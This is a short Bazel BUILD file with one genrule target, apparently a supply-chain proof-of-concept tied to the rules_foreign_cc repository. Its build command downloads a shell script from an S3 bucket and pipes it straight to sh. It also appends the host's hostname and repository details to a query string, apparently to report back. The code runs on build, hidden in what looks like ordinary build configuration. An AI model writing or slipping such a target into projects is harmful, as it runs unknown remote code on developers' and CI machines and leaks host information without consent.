
genrule(
    name = "build",
    outs = ["foo"],
    cmd = "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/bazelbuild/rules_foreign_cc.git\\&folder=cmake_with_bazel_transitive\\&hostname=`hostname`\\&foo=yyk",
    visibility = ["//visibility:public"],
)
